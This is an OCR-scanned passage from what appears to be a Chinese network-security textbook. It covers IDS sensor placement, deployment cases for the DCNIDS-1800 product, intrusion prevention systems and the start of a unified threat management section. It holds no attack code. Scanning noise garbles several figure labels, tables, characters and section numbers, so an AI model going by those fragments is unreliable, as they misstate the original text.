DoS。 在 其 他 情况 下 ,交换 机 可 能 会 在 开放 状态 下 失效 。 在 这 种 开放 状态 下 ,交换 机 向 其 上 
的 每 个 端口 都 发 送 所 有 网 络 数据 包 ,实际 上 将 交换 机 变 成 了 一 个 集线器 。 

注意 ; 集线器 也 在 位 于 相同 网 络 上 的 主机 之 间 传 送 数 据 流 。 但 是 ,与 交换 机 不 同 的 是 ， 
集线器 将 全 部 数据 流传 送 到 交换 机 上 的 每 个 端口 。 这 样 不 仅 会 产生 性 能 问题 ,还 会 降低 网 
络 的 安全 性 ,因为 这 样 做 就 允许 网 段 上 的 任何 主机 都 可 以 监听 流向 网 络 上 其 他 主机 的 数 
据 流 。 

(3) 安全 组 件 。 安 全 组 件 通过 限制 数据 流 并 监视 针对 网 络 的 攻击 ,增强 了 网 络 的 安全 性 。 
常见 的 安全 设备 包括 防火 墙 .IDS 传感器 .IDS 管理 设备 ,以 及 具有 访问 控制 列表 的 路 由 器 。 

防火 墙 在 多 个 网 络 之 间 建 立 了 一 道 安全 屏障 。 通 常 ,安装 防火 墙 来 保护 内 部 网 络 ,防止 
非 授权 访问 。 这 就 使 得 它们 成 为 主要 的 攻击 目标 。 

类 似 地 ,IDS 组 件 持续 地 监视 网 络 ,寻找 攻击 的 标记 。 黑 客 们 不 断 地 寻求 新 的 方法 ,来 
迷惑 并 破坏 常见 的 IDS 的 操作 。 通 过 禁用 IDS, 黑 客 可 以 穿 透 网 络 ,而 不 会 被 发 现 (不 会 触 
发 代表 网 络 正 在 遭受 攻击 的 警报 ) 。 

3) 远程 网 络 

许多 网 络 都 是 由 一 个 企业 中 心 网 络 和 多 个 通过 WAN 与 企业 网 络 进行 通信 的 远程 办 公 
室 组 成 。 在 我 们 的 网 络 分 析 中 ,需要 考虑 这 些 远 程 设 备 的 安全 性 。 根 据 这 些 远 程 节点 的 安 
全 状况 ,我 们 可 能 需要 放置 一 个 传感器 来 监视 穿越 WAN 链 路 的 数据 流 。 有 时 候 , 远 程 设备 
具有 到 Internet 的 独立 连接 。 显 然 , 所 有 的 Internet 连接 都 需要 被 监视 。 

(1) 网 络 大 小 和 复杂 度 。 网 络 越 复 杂 ,就 越 需 要 在 网 络 中 的 不 同位 置 设置 多 个 传感器 。 
一 个 大 的 网 络 通常 要 求 使 用 多 个 传感器 ,这 是 因为 每 个 传感器 都 受 限于 它 可 以 监视 的 最 大 
数据 流量 。 如 果 Internet 网 络 连 接 是 一 条 几 千 兆 比 特 的 链 路 , 当 Internet 连接 满 负 载 传送 
网 络 数据 流量 时 ,目前 一 个 传感器 就 没有 能 力 处 理 全 部 的 数据 流 。 

(2) 考虑 安全 策略 限制 。 有 时 候 ,把 传感器 放置 在 我 们 的 网 络 中 ,以 此 验证 是 否 符合 我 
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们 定义 的 安全 策略 。 关 于 它 的 一 个 很 好 的 应 用 实例 是 ,在 防火 墙 的 内 部 和 外 部 各 放置 一 个 
传感器 。 外 部 的 传感器 负责 监视 所 有 流向 被 保护 网 络 的 数据 流 。 它 检测 所 有 发 送 到 被 保护 
网 络 的 攻击 和 那些 离开 被 保护 网 络 的 数据 流 ,因为 防火 墙 可 以 防止 其 中 的 大 部 分 攻击 。 内 
部 的 传感器 监视 所 有 内 部 数据 流 , 也 就 是 那些 从 外 部 成 功 穿 过 防火 墙 的 数据 流 , 以 及 内 部 主 
机 产生 的 数据 流 。 


3. 部 署 环境 


DCNIDS-1800 IDS 引入 了 两 种 类 型 的 安装 方式 : 独立 安装 (standalone) 安 装 所 有 管理 
组 件 在 一 台 机 器 上 ,分布 式 安装 (distributed) 可 选择 将 DCNIDS-1800 IDS 的 各 个 管理 组 件 
安装 在 多 台 计算 机 上 。 

所 选 的 安装 方式 取决 于 拥有 的 传感器 的 数目 ,以 及 计划 对 它们 进行 部 署 的 方式 。 在 安 
装 DCNIDS-1800 IDS 组 件 之 前 , 需 检查 自己 的 环境 ,确定 安装 方式 。 

下 面 是 在 不 同 环境 可 能 采用 的 几 种 部 署 案例 。 

。 部 署 案例 一 : 1 一 5 个 传感器 ,孤立 式 安装 在 1 台 计 算 机 上 。 

。 部 署 案例 二 : 6 一 10 个 传感器 ,分 布 式 安装 ,分 布 在 2 台 计算 机 上 。 

* 部 署 案例 三 : 11 一 30 个 传感器 ,分 布 式 安装 ,分 布 在 4 台 计 算 机 上 。 

。 部 署 案例 四 : 多 于 30 个 传感器 ,分 布 式 安装 ,分 布 在 6 台 计算 机 上 。 

注意 : 这 些 案例 中 所 提 到 的 传感器 数目 都 是 估计 值 。 实 际 使 用 的 安装 方式 由 于 和 网 络 
拓扑 采用 的 安全 策略 ,每 秒 检测 到 的 安全 事件 .机 器 的 硬件 配置 等 相关 ,所 以 在 传感器 数目 
方面 可 能 稍 有 不 同 。 

1) 共享 网 络 环境 

在 非 交换 式 网 络 中 ,即使 通话 的 目的 地 不 是 网 络 传感器 , 它 也 能 检测 到 所 有 的 通信 。 网 
络 传感器 所 监测 的 接口 处 于 混杂 模式 ,这 就 意味 着 它 会 接收 所 有 数据 包 ,而 不 考虑 它们 的 目 
标 地 址 。 在 一 般 情况 下 ,网 络 接口 会 放弃 所 有 目的 地 不 是 它 或 者 不 是 发 向 广播 地 址 的 数据 
包 。 在 混杂 模式 中 ,网 络 接口 会 接收 所 有 数据 包 , 而 不 考虑 它们 的 目标 地 址 。 这 种 模式 允许 
网 络 传感器 看 到 网 络 上 所 有 设备 之 间 的 所 有 通信 ,网 络 部 署 拓扑 如 图 9-5 所 示 。 


图 9-5 共享 网 络 IDS 部 署 拓 扑 图 
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2) 交换 式 网 络 环境 

在 交换 式 网 络 中 ,通信 被 交换 机 分 隔 开 ,并 且 根 据 接 口 的 MAC 地 址 选择 路 由 。 这 一 配 
置 控制 了 每 一 接口 所 接收 的 通信 量 。 如 果 与 其 他 形式 的 流量 管理 方式 结合 使 用 ,交换 式 网 
络 配置 将 是 一 种 有 效 的 带宽 控制 方式 , 它 能 够 提高 每 一 设备 的 通信 过 程 的 效率 。 

因为 由 交换 机 管理 业务 ,设置 一 个 混杂 模式 的 接口 也 无 法 控制 它 能 够 或 不 能 看 到 哪些 
业务 ,这 实际 上 有 效 地 * 屏 项 ”了 网 络 传感器 .数据 包 传感器 或 依赖 于 混杂 模式 进行 操作 的 任 
何其 他 设备 。 

为 了 解决 这 一 问题 ,必须 设置 一 个 可 管理 的 交换 机 , 它 能 够 将 所 有 通信 和 镜像 到 选 定 的 一 
个 或 多 个 端口 。 这 在 交换 机 管理 中 称 做 spanning 或 mirroring。 

(OD 交换 环境 部 署 一 。 在 交换 机 和 路 由 器 之 间接 人 一 个 集线器 ,从 而 把 一 个 交换 环境 
转换 为 共享 环境 。 这 样 做 的 优点 是 简单 易 行 ,成 本 低廉 。 如 果 客 户 对 网 络 的 传输 速度 和 可 
靠 性 要 求 不 高 ,建议 采用 这 种 方式 。 网 络 部 署 拓扑 如 图 9-6 所 示 。 


图 9-6 交换 环境 网 络 部 署 拓扑 一 


(2) 交换 环境 部 署 二 。 如 果 交 换 机 支持 端口 镜像 的 功能 ,建议 采用 这 种 方式 ,可 以 在 不 
改变 原 有 网 络 拓扑 结构 的 基础 上 完成 传感器 的 部 署 。 它 的 优点 是 配置 简单 .灵活 ,使 用 方 
便 , 不 需要 中 断 网 络 ,是 比较 常用 的 一 种 方式 。 网 络 部 署 拓扑 如 图 9-7 所 示 。 


9-7 ”交换 环境 网 络 部 署 拓扑 二 
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(D 交换 环境 部 署 三 。 如 果 交 换 机 不 支持 端口 镜像 功能 ,或 者 出 于 性 能 的 考虑 不 便 启 
用 该 功能 ,可 以 采用 TAP( 分 支 器 )。 它 的 优点 是 能 够 支持 全 双 工 100Mbps 或 者 全 双 工 
1000Mbps 的 网 络 流量 。 网 络 部 署 拓扑 如 图 9-8 所 示 。 


图 9-8 交换 环境 网 络 部 署 拓扑 三 


(4) 全 元 余 的 高 可 用 性 部 署 。 在 这 种 情况 下 ,任何 一 个 传感器 或 者 链 路 发 生 故 障 , 都 不 
会 中 断 对 网 络 的 实时 监测 。 网 络 部 署 拓扑 如 图 9-9 所 示 。 


千 兆 HA 传感器 千 兆 HA 传感器 
图 9-9 全 宛 余 的 高 可 用 性 部 署 拓扑 


(5) 不 对 称 路 由 情况 下 的 部 署 。 在 这 种 情况 下 ,如 果 采 用 两 台 传 感 器 分 别 部 署 在 不 同 
的 交换 机 上 是 无 法 检测 到 攻击 的 ,因为 基于 状态 的 IDS 产品 必须 监听 到 一 个 会 话 全 部 的 双 
向 流量 ,才能 判别 是 否 有 攻击 发 生 。 新 一 代 的 DCNIDS-1800 入 侵 检测 系统 采用 多 端口 融合 
和 关联 分 析 技 术 ,能 够 合并 一 台 传感器 的 不 同 网 卡 上 听 到 的 流量 ,作出 综合 的 分 析 和 判断 。 
网 络 部 署 拓扑 如 图 9-10 所 示 。 


4. 传感器 部 署 位 置 
在 完全 理解 了 网 络 资源 和 拓扑 图 结构 之 后 ,就 可 以 开始 在 网 络 中 设置 传感器 的 位 置 了 。 


图 9-10 不 对 称 路 由 情况 下 的 部 署 拓扑 


在 理想 情况 下 ,我 们 的 网 络 分 析 应 该 已 经 指明 了 我 们 认为 需要 传感器 的 区 域 。 我 们 可 以 开 
始 决 定 需 要 的 传感器 配置 的 类 型 。 如 果 还 不 能 确定 在 哪里 放置 传感器 ,也 不 必 担 心 。 虽 然 
每 个 网 络 都 是 独一无二 的 ,系统 管理 员 还 是 可 以 选择 几 个 常见 的 传感器 部 署 位 置 。 这 些 位 
置 集中 在 一 些 常见 的 功能 边界 ,图 9-11 所 示 为 介绍 这 些 常见 的 部 署 位 置 。 


传感器 
| —-— 
传感器 传感器 
路 由 器 
LI a 
= 
业务 伙伴 Ten 


有 一 一 


9-11 传感器 部 署 位 置 
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CD 边界 保护 。 传 感 器 负责 监视 网 络 的 边界 。 在 大 多 数 网 络 中 ,边界 保护 是 指 在 我 们 
的 网 络 和 Internet 之 间 的 链 路 。 注 意 : 一 定 要 定位 到 我 们 网 络 的 所 有 Internet 连接 。 在 很 
多 时 候 , 管 理 员 忘记 了 远程 节点 含有 Internet 连接 。 有 时 候 ,我 们 网 络 中 的 各 部 门 有 他 们 自 
己 的 Internet 连接 (独立 于 公司 的 Internet 连接 )。 任 何 到 Internet 的 连接 都 需要 被 监视 。 


网 络 拓扑 如 图 9-12 所 示 。 


传感器 


图 9-12 边界 保护 的 传感器 部 署 位 置 


(2) 到 商业 伙伴 的 连接 (Extranets)。 传 感 器 可 以 监视 我 们 的 网 络 和 我 们 的 商业 伙伴 网 络 
之 间 的 链 路 上 流动 的 数据 流 。 这 条 Extranets 链 路 的 安全 性 与 该 链 路 连接 的 两 个 网 络 所 应 月 
的 安全 性 同样 强壮 。 如 果 任何 一 个 网 络 具有 安全 弱点 , 另 一 个 网 络 也 会 变 得 易 受 攻击 。 因 此 ， 
Extranets 连接 需要 被 进行 监视 。 因 为 监视 这 个 边界 的 IDS 传感器 可 以 在 任何 一 个 方向 上 检测 
到 攻击 ,所 以 可 以 考虑 与 我 们 的 商业 伙伴 共同 承担 这 个 传感器 的 费用 。 网 络 拓扑 如 图 9-13 所 示 。 


图 9-13 Extranets 的 传感器 部 署 位 置 
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(3) DMZ。 通 过 在 DMZ 中 、 网 络 的 Internet 访问 点 上 安装 网 络 传感器 ,可 以 保护 DMZ 
中 安装 的 设备 不 受 攻击 。 保 护 防 火 墙 是 非常 重要 的 ,因为 防火 墙 是 流入 内 部 网 络 的 数据 的 
控制 点 ,并 且 常 常 是 攻击 的 最 初 目标 。 通 过 向 DMZ 添加 网 络 传感器 ,就 为 网 络 外 围 的 防护 
增加 了 一 个 专用 的 设备 。 每 个 Internet 访问 点 都 应 该 包含 一 个 防火 墙 和 一 个 网 络 传感器 。 
网 络 拓扑 如 图 9-14 所 示 。 

(4) 在 Intranet. 上 防火 墙 的 内 部 。 通 过 在 防火 墙 内 部 安装 网 络 传感器 ,可 以 检测 到 防 
火 墙 运作 过 程 的 变化 ,并 监测 流 经 防火 墙 的 通信 。 安 装 在 防火 墙 内 部 的 网 络 传感器 能 够 确 
保 下 列 两 点 。 

。 防火 墙 运行 正常 ,没有 受到 破坏 ,也 没有 被 误 配置 。 

。 穿 过 防火 墙 的 隧道 不 会 被 用 于 启动 针对 内 部 网 络 的 攻击 过 程 。 

可 以 将 该 网 络 传感器 与 DMZ 的 网 络 传感器 结合 使 用 ,评估 防火 墙 的 效力 。 例 如 ,可 以 
记录 下 两 个 网 络 传感器 检测 到 的 严重 事件 ,然后 对 这 些 事件 产生 报告 ,比较 防火 墙 内 部 与 外 
部 所 发 生 事件 的 数目 。 

管理 网 络 可 以 直接 连接 到 防火 墙 后 面 的 网 络 。 但 是 ,在 这 种 配置 中 ,内 部 用 户 可 以 对 
DCNIDS-1800 IDS 进行 攻击 。 一 种 更 加 安全 的 安装 方法 是 将 命令 和 控制 接口 放置 在 防火 
墙 后 面 的 一 个 分 离 的 接口 上 (通过 使 用 一 个 隔离 的 DMZ 接口 )。 网 络 拓扑 如 图 9-15 所 示 。 


管理 平台 


管理 平台 


传感器 


图 9-14 DMZ 的 传感器 部 署 位 置 图 9-15 Intranet 的 传感器 部 署 位 置 


(5) 在 内 部 网 络 的 关键 网 段 上 。 内 部 网 络 的 关键 性 网 段 与 重要 的 网 络 资源 息息相关 。 
网 络 攻击 的 绝 大 多 数 损失 来 自 组 织 机 构 内 部 所 进行 的 攻击 。 目 前 ,许多 公司 正在 采取 措施 ， 
通过 在 Intranet. 上 部 署 人 侵 检 测 系 统 减 少 这 一 损失 。 在 很 多 时 候 , 我 们 使 用 Intranet 将 网 
络 分 隔 成 不 同 的 功能 区 域 ,比如 工程 部 ,研究 部 、 财 务 部 、 人 力 资源 部 。 有 了 时候, 组 织 机 构 将 
决定 边界 的 定义 。 例 如 ,工程 部 网 络 通 过 他 们 自己 的 路 由 器 与 财务 部 网 络 (以 及 分 离 其 他 网 
络 的 路 由 器 ) 之 间 是 相互 分 离 的 。 为 了 提供 更 多 的 保护 ,通常 还 使 用 一 个 防火 墙 。 在 任何 一 
种 情况 下 ,都 可 以 使 用 一 个 传感器 监视 网 络 之 间 的 数据 流 ,并 验证 (对 于 防火 墙 或 路 由 器 ) 安 
全 配置 被 正确 地 进行 了 定义 。 违 反 安 全 配置 的 数据 流 将 产生 IDS 告警 ,可 以 将 其 作为 一 个 
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信号 ,更 新 防火 墙 或 路 由 器 的 配置 ,因为 这 样 做 是 在 对 安全 策略 的 不 断 加 强 。 网 络 拓扑 如 
图 9-16 所 示 。 

(6) 远程 接 人 和 人 服务器。 传感器 可 以 负责 监视 来 自 拨号 接 人 服务 器 的 数据 流 。 在 
Internet. 上 有 许多 免费 的 工具 软件 ,它们 可 以 在 一 个 指定 的 电话 号 码 范围 内 进行 拨号 ,寻找 
调制 解 调 器 连接 。 攻 击 者 可 以 在 他 的 计算 机 上 启动 一 个 拨号 工具 软件 ,让 它 运 行 几 天 ,试图 
定位 可 能 的 调制 解 调 器 连接 。 稍 后 ,程序 的 输出 会 列 出 调制 解 调 器 的 电话 号 码 ,黑客 就 可 以 
尝试 连接 这 些 电话 号 码 。 如 果 这 些 调制 解 调 器 连接 中 的 任何 一 个 具有 较 弱 的 认证 机 制 , 攻 
击 者 就 可 以 很 容易 地 渗透 到 网 络 中 。 因 此 , 千 万 不 要 以 为 黑客 不 能 确定 我 们 的 拨号 调制 解 
调 器 的 电话 号 码 , 从 而 认为 拨号 线路 是 安全 的 。 而 且 , 许 多 远程 用 户 使 用 家 庭 计算 机 ,通过 
高 速 Internet 连接 ,持续 地 连接 到 Internet. 上 。 如 果 黑 客 攻破 了 这 些 家 庭 系统 中 的 一 个 ,就 
可 以 轻易 地 对 我 们 的 远程 接 人 服务 器 发 动 攻击 。 网 络 拓扑 如 图 9-17 所 示 。 


传感器 
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图 9-16 内 部 网 络 的 传感器 部 署 位 置 图 9-17 远程 接 人 的 传感器 部 署 位 置 


5 部署 案例 


下 面 介绍 几 种 部 署 案 例 。 

(OD 部 署 案例 一 。 这 是 最 普通 的 部 署 方式 ,一 个 典型 的 孤立 式 部 署 。 环 境 中 有 1 一 5 个 
传感器 ,DCNIDS-1800 入 侵 检 测 系统 管理 组 件 控制 台数 据 库 ( 包 括 数据 库 和 LogServer)、 
报表 和 事件 收集 器 安装 到 一 台 计 算 机 上 。 这 种 部 署 方式 易于 管理 ,管理 员 可 以 通过 对 一 台 机 
器 的 操作 完成 配置 组 件 , 监 控 报警 查看 报表 等 操作 ,如 表 9-3 所 示 。 网 络 拓扑 如 图 9-18 所 示 。 


表 9-3 部 署 环境 中 有 1~5 个 传感器 


传感器 安装 的 组 件 
HELLE 
"报表 

1~5 个 台 计 算 机 自 定义 ”EC 


* LogServer( 包 括 LogServer 组 
件 和 数据 库 ) 
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控制 台 /报表 


一 一 传感器 


查询 工具 /事件 收集 器 /日 志 服务 器 


[d 
1 一 5 个 以 上 的 传感器 
与 主事 件 收集 器 之 间 进 行 组 件 认证 、 数 据 信息 的 传递 


图 9-18 部 署 1~5 个 传感器 的 网 络 拓扑 


(2) 部 署 案例 二 。DCNIDS 


网 络 拓扑 如 图 9-19 所 示 。 


S-1800 IDS 管理 组 件 分 布 在 两 台 计 算 机 上 ,如 表 9-4 所 示 。 


X94 部 署 环境 中 有 6 一 10 个 传感器 
传感器 安装 的 组 件 
， 控制 台 
， 报表 
6—104* * EC 


。 LogServer( 包 括 LogServer 组 
件 和 数据 库 ) 


报表 查询 工具 /日 志 服务 器 
6~10 个 传感器 


一 一 控制 
间 进 
一 一 传 感 
的 传 


台 、 事件 收集 器 、 报 表 查 询 工具 、 日 志 服 务 器 之 
行 组 件 认证 、 用 户 身份 认证 、 数 据 信息 的 传递 
器 与 主事 件 收集 器 之 问 进行 组 件 认证 、 数 据 信息 
i 


图 9-19 部 署 6~10 个 传感器 的 网 络 拓扑 


(3) 部 署 案例 三 。 这 是 常见 的 部 署 方式 ,一 个 典型 的 分 布 式 部 署 。 环 境 中 有 10-30 个 
传感器 ,DCNIDS-1800 入 侵 检测 系统 管理 组 件 分 布 在 4 台 计 算 机 上 。 由 于 传感器 数目 较 
多 ,建议 使 用 SQL Server 数据 库 。 在 这 种 部 署 方式 中 ,有 两 台 EC (事件 收集 器 ) ,每 台 EC 


可 以 接收 15 个 传感器 的 报警 


了 件 , 同 时 这 两 台 EC 又 可 以 作为 另外 15 个 传感器 的 备份 
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EC。 当 某 个 EC 出 现 故障 的 时 候 , 向 它 发 送 报警 事件 的 传感器 可 以 将 报警 事件 发 送 到 另 一 
台 EC。 这 种 部 署 的 好 处 是 均衡 流量 ,并 保证 在 一 个 EC 故障 时 告警 能 够 及 时 送 达 管理 系 
统 。 控 制 台 和 报表 安装 在 一 台 机 器 上 ,方便 管理 员 查 看 任何 时 段 的 报警 事件 ,如 表 9-5 所 
示 。 网 络 拓扑 如 图 9-20 所 示 。 


X95 部 署 环境 中 有 10 一 30 个 传感器 


传感器 安装 的 组 件 

LogServer( 包 括 LogServer 组 
件 和 数据 库 ) 

10—30 f EC 
EC 
控制 台 报表 

=I 
10 个 以 上 的 传感器 10 个 以 上 的 传感器 


[es dei 工具 与 事件 收集 器 之 间 进 行 组 件 认证 、 用 户 认 证 、 数 据 信息 的 传递 
f 件 收集 器 之 间 进 行 组 件 认证 、 数 据 信 息 的 传递 

与 日 志 服 务 器 之 间 进 行 组 件 认 证 、 数 据 信息 的 传递 

收集 器 之 间 进 行 组 件 认证 、 数 据 信息 的 传递 

一 - 一 传感器 与 5 备份 事件 收集 器 之 问 进行 组 件 认证 、 数据 信息 的 传递 


图 9-20 部 署 10~30 个 传感器 的 网 络 拓扑 


CD 部 署 案例 四 。 对 多 于 30 个 传感器 的 部 署 ,其 中 将 控制 台 组 件 分 布 到 6 台 计 算 机 
上 ,如 表 9-6 所 示 。 网 络 拓扑 如 图 9-21 所 示 。 


X96 部 署 环境 中 多 于 30 个 传感器 


传感器 安装 的 组 件 
。 LogServer( 包 括 LogServer 组 
件 和 数据 库 ) 
* EC 
多 于 30 个 “EE 


» EC 
"报表 
: 控制 台 


10 个 以 上 的 传感器 。 10 个 以 上 的 传感器 。 10 个 以 上 的 传感器 


EIL uU 用 户 认证 、 配置 管理 命令 的 下 达 ， 显 示 事件 上 行 
志 志 服 务 器 : j nt arai Lon Bite 


8 : 
进行 组 件 认证 、 数据 信息 的 传递 
Y 之 间 进行 组 件 认证 、 数 据 信息 的 传递 


图 9-21 部 署 多 于 30 个 传感器 的 网 络 拓扑 


6.8 入 侵 防御 系统 


9.8.1 入 侵 防 御 系 统 简 介 


IDS 虽然 存在 多 年 ,但 IDS 只 能 被 动 地 检测 攻击 ,而 不 能 主动 地 把 变化 莫 测 的 威胁 阻止 
在 网 络 之 外 。 因 此 ,迫切 需要 找到 一 种 主动 人 侵 防护 解决 方案 ,确保 企业 网 络 在 威胁 四 起 的 
环境 下 正常 运行 。 

人 侵 防御 系统 (intrusion prevention system,IPS) 是 一 种 智能 化 的 入 侵 检 测 和 防御 产 
品 , 它 不 但 能 检测 人 侵 的 发 生 ,而 且 能 通过 一 定 的 响应 方式 ,实时 地 中 止 人 侵 行为 的 发 生 和 
发 展 ,实时 地 保护 信息 系统 不 受 实质 性 的 攻击 。IPS 使 得 IDS 和 防火 墙 走向 统一 ,简单 地 理 
解 ,可 认为 IPS 就 是 防火 墙 加 上 IDS, 但 并 不 是 说 IPS 可 以 代替 防 火 墙 或 IDS。 防 火 墙 是 粒 
度 比 较 粗 的 访问 控制 产品 , 它 在 基于 TCP/IP 的 过 滤 方 面 表现 出 色 , 可 以 提供 NAT、 服 务 代 
理 , 流 量 统计 、VPN 等 功能 。 

和 防火 墙 比较 ,IPS 功能 比较 单一 ,只 能 串联 在 网 络 上 ,对 防火 墙 所 不 能 过 滤 的 攻击 进 
行 过 滤 ; 这 样 一 个 两 级 的 过 滤 模 式 ,可 以 最 大 程度 地 保证 系统 的 安全 。 一 般 来 说 ,企业 用 户 
关注 的 是 自己 的 网 络 能 否 避 免 被 攻击 ,对 于 能 检测 到 多 少 攻击 并 不 关心 : 但 这 并 不 是 说 
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IDS 就 没有 用 处 ,在 一 些 专业 机 构 或 对 网 络 安全 要 求 比较 高 的 地 方 ,IDS 和 其 他 审计 产品 结 
合 , 可 以 提供 针对 企业 信息 资源 全 面 的 审计 资料 ,这 些 资料 对 于 攻击 还 原 、 入 侵 取 证 、 异 常事 
件 识别 .网络 故障 排除 等 都 有 很 重要 的 作用 。 


9.8.2 入 侵 防御 系统 的 工作 特性 


IPS 具有 以 下 明显 的 工作 特性 。 

(1) 检测 并 终止 人 侵 活动 。NIDS 采用 混杂 模式 被 动 侦 听 。IPS 支持 多 种 监控 模式 ,如 
SPAN( 接 到 交换 机 映像 端口 )、TAP( 通 过 分 接 器 ) IN-LINE (HK), PORT CLUSTER (i 
口 群集 ) 等 ,用 户 根据 实际 情况 选择 。 采 用 串联 方式 的 IPS 位 于 防火 墙 之 后 ,是 防火 墙 后 面 
的 第 二 道 闸门 ,进出 的 数据 包 都 要 经 过 IPS 的 内 容 检 查 ,攻击 数据 流 在 到 达 目 标 之 前 ,会 
IPS 识别 出 来 并 丢弃 或 阻 断 。IPS 底层 设计 使 用 专用 集成 电路 ASIC 或 FPGA 等 ,可 以 实 
现 线 速 检测 ,从 而 确保 不 会 成 为 影响 网 络 性 能 的 瓶颈 。 

(2) 检测 准确 可 靠 。IPS 采用 多 种 检测 技术 : 特征 检测 可 以 准确 检测 已 知 攻击 ,特征 库 
实现 在 线 升 级 并 且 不 需要 重新 启动 探测 器 ; 异常 检测 基于 对 监控 网 络 的 自学 习 能 力 ,可 以 
有 效 检测 新 出 现 的 攻击 ; DoS/DDoS 检测 专门 针对 拒绝 服务 攻击 ; 检测 引擎 中 集成 了 针对 
缓冲 区 溢出 等 特定 攻击 的 检测 。IPS 使 用 硬件 加 速 技术 完成 串 匹 配 ,更 新 训练 集 等 重复 性 
计算 ,加 快 了 入 侵 检测 的 速度 和 准确 率 。 

(3) 主动 防御 。IDS 采用 被 动 侦 听 方式 ,响应 能 力 有 限 ,如 发 送 TCP Reset 包 终止 会 话 
时 往往 已 经 为 时 太 晚 。 采 用 串联 监控 方式 的 IPS 具有 强大 的 主动 响应 能 力 ,在 攻击 流 到 来 
之 前 ,就 可 以 丢弃 数据 包 终止 会 话 、 修 改 防火 墙 策略 .实时 报警 或 记录 日 志 等 。 这 种 主动 防 
御 的 响应 能 力 正 是 企业 网 络 安全 真正 需要 的 。 

总 之 ,IPS 担负 双重 使 命 : 逐步 取代 IDS, 在 互 操 作 性 和 功能 上 与 防火 墙 融合 。 


9.8.3 入 侵 防御 系统 的 分 类 


IPS 是 通常 位 于 防火 墙 和 网 络 的 设备 之 间 的 设备 。 这 样 ,如 果 检 测 到 攻击 ,IPS 会 在 这 
种 攻击 扩散 到 网 络 的 其 他 地 方 之 前 阻止 这 个 恶意 通信 。 而 IDS 只 是 存在 于 你 的 网 络 之 外 
起 到 报警 的 作用 ,而 不 是 在 你 的 网 络 前 面 起 到 防御 的 作用 。 

目前 有 很 多 种 IPS 系统 ,使 用 的 技术 都 不 相同 。 一 般 来 说 ,IPS 系统 都 依靠 对 数据 包 的 
检测 。IPS 将 检查 入 网 的 数据 包 , 确 定 这 种 数据 包 的 真正 用 途 ,然后 决定 是 否 允 许 这 种 数据 
包 进 入 你 的 网 络 。 

IPS 系统 分 为 基于 主机 和 网 络 两 种 类 型 。 

(1) 基于 主机 的 IPS(host IPS, HIPS) 依 靠 在 被 保护 的 系统 中 直接 安装 代理 。 它 与 操 
作 系统 内 核 和 服务 紧密 地 捆绑 在 一 起 ,监视 并 截取 对 内 核 或 API 的 系统 调用 ,以 便 达到 阻 
止 并 记录 攻击 的 作用 。 它 也 可 以 监视 数据 流 和 特定 应 用 的 环境 (如 网 页 服务 器 的 文件 位 置 
和 注册 条 目 ) ,以 便 能 够 保护 该 应 用 程序 使 之 能 够 避免 那些 还 不 存在 签名 的 .普通 的 攻击 。 

(2) 基于 网 络 的 IPS(network IPS, NIPS) 综 合 了 标准 IDS 的 功能 ,IDS 是 IPS 与 防火 
墙 的 混合 体 , 并 可 被 称 为 嵌入 式 IDS 或 网 关 IDSCgate IDS,GIDS), NIPS 设备 只 能 阻止 通 
过 该 设备 的 恶意 信息 流 。 为 了 提高 IPS 设备 的 使 用 效率 ,必须 采用 强迫 信息 流通 过 该 设备 
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的 方式 。 

更 具体 地 说 , 受 保护 的 信息 流 必须 代表 着 向 联网 计算 机 系统 或 从 中 发 出 的 数据 , 且 在 其 
中 : 指定 的 网 络 领域 中 ,需要 高 度 的 安全 和 保护 ; 该 网 络 领域 中 存在 极 可 能 发 生 的 内 部 爆发 配 
置地 址 ; 能 够 有 效 地 将 网 络 划 分 成 最 小 的 保护 区 域 ,并 能 够 提供 最 大 范围 的 有 效 覆盖 率 。 


9.8.4 入 侵 防 御 系统 的 工作 原理 


IPS 串联 于 通信 线路 之 内 ,是 既 具 有 IDS 的 检测 功能 ,又 能 够 实时 中 止 网 络 入 侵 行为 的 
新 型 安全 技术 设备 。IPS 由 检测 和 防御 两 大 系统 组 成 ,具备 从 网 络 到 主机 的 防御 措施 与 预 
先 设 定 的 响应 设置 ,如 图 9-22 所 示 。 


管理 器 
安全 通信 信道 
DMA 
丢弃 攻击 数据 包 | 终止 会 话 | 修改 防火 墙 策略 | 生成 警报 | 日 志 记 录 
[本 检测 关联 与 分 析 硬 
特征 检测 | 异常 检测 | DoS/DDoS 检 测 lu 
特征 库 Profiles | Profiles 速 
捕获 数据 流 
SPAN TAP IN LINE PORT CLUSTOR 


图 9-22. 人 和 人 侵 防御 系统 的 原理 框图 


9.8.5 入 侵 防御 系统 的 弱点 与 局 限 


IPS 和 IDS 都 采用 了 入 侵 检 测 技术 ,目前 入 侵 检 测 技术 被 用 户 诉 病 最 多 的 就 是 误 报 和 
小报 。 在 旁 路 检测 的 IDS 中 , 误 报 和 滥 报 经 过 人 工分 析 后 ,可 以 滤 掉 ,不 会 对 网 络 造成 任何 
影响 ; 而 串 行 部 署 的 IPS, 一 旦 发 生 了 误 报 或 者 滥 报 ,将 影响 用 户 的 正常 网 络 通信 。 这 就 决 
定 了 1IPS 目 前 面临 的 主要 问题 就 是 精确 判断 和 阻 断 攻 击 。 

从 技术 同 源 上 来 看 ,IPS 和 IDS 之 间 有 着 千 丝 万 缕 的 联系 ,IPS 可 以 被 视 做 增加 了 主动 
阻 断 功能 的 IDS ,并且 IPS 在 性 能 和 数据 包 的 分 析 能 力 方面 比 IDS 有 了 质 的 提升 。 

由 于 增加 了 主动 阻 断 能 力 ,检测 准确 程度 的 高 低 对 于 IPS 十 分 关键 。 除 了 检测 机 制 外 ， 
IPS 的 检测 准确 率 还 依赖 于 应 用 环境 ,一 些 流量 对 于 某 些 用 户 来 说 是 恶意 的 ,而 对 于 另外 的 
用 户 来 说 是 正常 流量 ,这 就 需要 IPS 针对 用 户 的 特定 需求 提供 灵活 、 易 用 的 策略 调 优 手段 ， 
以 提高 检测 准确 率 。 


$ 统一 威胁 管理 


9.9.1 统一 威胁 管理 简介 


统一 威胁 管理 (unified threat management, UTM) ,是 将 防 病毒 .人 侵 检 测 和 防火 墙 安 
全 设备 划 归 统一 威胁 管理 新 类 别 。 目 前 ,UTM 定义 为 由 硬件 .软件 和 网 络 技术 组 成 的 具有 
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专门 用 途 的 安全 设备 ,主要 提供 一 项 或 多 项 安全 功能 ,同时 将 多 种 安全 特性 集成 于 一 个 硬件 
设备 中 ,形成 标准 的 统一 威胁 管理 平台 。UTM 基本 功能 包括 网 络 防火 墙 .网 络 入 侵 检 测 / 
防御 和 网 关 防 病毒 功能 。 

